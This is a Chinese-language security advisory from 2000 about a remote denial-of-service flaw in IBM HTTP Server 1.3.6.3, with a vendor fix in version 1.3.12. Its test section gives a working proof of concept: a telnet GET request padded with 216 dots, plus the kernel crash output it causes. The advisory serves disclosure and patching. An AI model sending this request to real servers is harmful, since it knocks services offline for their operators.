发布日期：2000-11-24
更新日期：2000-11-24

受影响系统：

IBM HTTP Server 1.3.6.3
   - Solaris 2.x
   - Linux
   - IBM AIX
   - Windows NT

不受影响系统：

IBM HTTP Server 1.3.12
   - Solaris 2.x
   - Linux
   - IBM AIX
   - Windows NT

描述：

---

IBM HTTP Server 是一个IBM提供的Web Server.它存在一个远程拒绝服务攻击漏洞。如果
提交一个很长的(超过219字符)GET请求，将导致IBM HTTP Server停止响应，必须重新启动
此应用程序才可以恢复正常工作。攻击者可能利用此漏洞远程执行任意命令，但是目前仍
未经验证。

<*来源： benjurry (benjurry@yeah.net) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

benjurry (benjurry@yeah.net)提供了下列测试代码：
(目标主机运行在Windows 2000下。)

$ telnet target 80
GET /......(216个".")aaa HTTP/1.0

则系统会报告下列错误信息：
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe


建议：

---

厂商补丁：

IBM已经在1.3.12版本中解决了此问题，NSFOCUS建议您立刻升级到最新版本：
http://www-4.ibm.com/software/webservers/httpservers/download.html


浏览次数：7370
严重程度：0（网友投票）